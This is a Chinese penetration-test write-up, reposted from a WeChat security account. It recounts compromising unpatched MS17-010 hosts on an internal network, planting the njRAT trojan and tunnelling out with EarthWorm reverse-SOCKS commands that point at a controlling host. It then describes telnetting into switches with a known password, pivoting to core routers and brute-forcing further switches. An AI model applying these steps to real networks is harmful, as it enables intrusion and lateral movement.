复盘从一个监控主机到核心路由沦陷

admin 2022年11月9日13:17:21安全文章评论9 views643字阅读2分8秒阅读模式

在对内网进行 ms17-010 扫描时,发现 2 台之前没有出现过且没有打补丁的主机,于是,尝试了一波

kali 主机在扫描时发现 2 台之前没有出现过且没有打补丁的主机

复盘从一个监控主机到核心路由沦陷

尝试打了一波

复盘从一个监控主机到核心路由沦陷

然后种了个 njrat

复盘从一个监控主机到核心路由沦陷

翻文件的时候发现了点配置文件

复盘从一个监控主机到核心路由沦陷


down 下来解压后发现是交换机的配置文件,于是有了一个大胆的想法

复盘从一个监控主机到核心路由沦陷

查看了被控主机的网络连接后,发现一个地址无法 ping 通,TCP 包也无法到达,推测做了 ACL

复盘从一个监控主机到核心路由沦陷

于是在被控机上搭了 earthworm 做转发

本机执行 ew -s rcsocks -l 本地代理端口 -e 远端连接端口

被控机执行 ew -s rssocks -d 主控机IP -e 远端连接端口

复盘从一个监控主机到核心路由沦陷

然后开启 proxifier 的代理功能,成功访问了那个系统,但这不是主要目的

复盘从一个监控主机到核心路由沦陷

在咨询了好哥们后,他建议尝试搞搞交换机看看

在对 10.2.66/24 网段扫描后发现 10.2.66.254 开放了 80 和 23 端口,尝试 xshell 连接

复盘从一个监控主机到核心路由沦陷

成功使用 huawei 密码 [email protected] 连接,继续翻上级路由

复盘从一个监控主机到核心路由沦陷

复盘从一个监控主机到核心路由沦陷

发现了 10.2.20.1

继续 telnet

复盘从一个监控主机到核心路由沦陷

继续翻

复盘从一个监控主机到核心路由沦陷

发现 10.2.20.58

复盘从一个监控主机到核心路由沦陷

继续翻,翻到 10.4.0.1

复盘从一个监控主机到核心路由沦陷

继续 telnet

复盘从一个监控主机到核心路由沦陷

另外发现此时可以 ping 通 10.4.0.1 这台交换机

复盘从一个监控主机到核心路由沦陷

于是乎,扔浏览器打开看看

复盘从一个监控主机到核心路由沦陷


复盘从一个监控主机到核心路由沦陷

拿下后将本次收集到的密码与巡风扫描到的 telnet 主机进行爆破后发现了更多的交换机。。。。。。

复盘从一个监控主机到核心路由沦陷


作者:Sp4ce








复盘从一个监控主机到核心路由沦陷复盘从一个监控主机到核心路由沦陷

↑↑↑长按图片识别二维码关註↑↑↑




原文始发于微信公众号(全栈网络空间安全):复盘从一个监控主机到核心路由沦陷

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日13:17:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  复盘从一个监控主机到核心路由沦陷 http://cn-sec.com/archives/1393454.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: